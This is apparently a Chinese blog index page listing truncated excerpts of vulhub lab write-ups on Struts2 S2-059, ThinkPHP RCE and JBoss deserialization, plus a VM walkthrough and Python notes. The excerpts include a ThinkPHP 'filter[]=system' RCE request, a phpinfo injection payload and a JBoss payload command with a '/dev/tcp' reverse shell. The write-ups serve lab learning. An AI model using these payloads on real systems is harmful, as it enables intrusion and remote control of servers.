摘要: 漏洞环境搭建 docker-compose + vulhub 进入 s2-059目录后 docker-compose up -d 访问 ip:8080 即可 漏洞简介及影响范围 攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性 阅读全文
posted @ 2021-04-29 22:10 ze_z 阅读(220) 评论(0) 推荐(0) 编辑
摘要: 1,环境搭建 docker + vulhub 判断struts 一般攻击者在攻击之前会判断网站是Struts2编写,主要看有没有链接是.action或者.do结尾的,这是因为配置文件struts.xml指定了action的后缀 漏洞原因 用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使 阅读全文
posted @ 2021-03-28 09:57 ze_z 阅读(98) 评论(0) 推荐(0) 编辑
摘要: 文件处理 f=open(“name.txt”,'r') //读取文件name.txt for line in f.readlines(): //line 为 name.txt 中每以行 han=line.strip('\n') //去掉换行 sys模块 import sys //导入sys模块 // 阅读全文
posted @ 2021-03-17 21:53 ze_z 阅读(27) 评论(0) 推荐(0) 编辑
摘要: 1 环境 kali 2021(nat 模式) 靶机(nat模式) 2信息收集 netdiscover 发现靶机ip 靶机ip:192.168.159.129 查看开发端口 nmap -T4 -A -p- 192.168.159.129 使用kali默认字典扫描下目录 看一下80端口 添加XFF 在l 阅读全文
posted @ 2021-03-16 16:07 ze_z 阅读(92) 评论(0) 推荐(0) 编辑
摘要: post提交数据 POST /index.php?s=captcha HTTP/1.1 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd &server[REQUEST_METHOD] 变量会被执行 p 阅读全文
posted @ 2021-03-15 14:02 ze_z 阅读(1004) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 kali中下载vulhub 安装docker 与docker-compose 漏洞影响范围 thinkphp2.x 漏洞复现 payload1 /index.php?s=/index/index/xxx/${@phpinfo()} //出现phpinfo明杆路径 payload2 /ind 阅读全文
posted @ 2021-03-14 20:22 ze_z 阅读(300) 评论(0) 推荐(0) 编辑
摘要: 影响范围 JBoss AS 4.x及之前版本 复现 编译生成序列化数据 序列化恶意数据 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.16 阅读全文
posted @ 2021-03-14 12:24 ze_z 阅读(336) 评论(0) 推荐(0) 编辑
摘要: 环境 vulhub +docker 搭建 访问 /invoker/readonly 返回500,说明页面存在,此页面存在反序列化漏洞 github 上 有可用的exp https://github.com/yunxu1/jboss-_CVE-2017-12149 验证 修复 不需要 http-inv 阅读全文
posted @ 2021-03-13 21:43 ze_z 阅读(99) 评论(0) 推荐(0) 编辑
摘要: # hello word 阅读全文
posted @ 2021-03-12 16:37 ze_z 阅读(23) 评论(0) 推荐(0) 编辑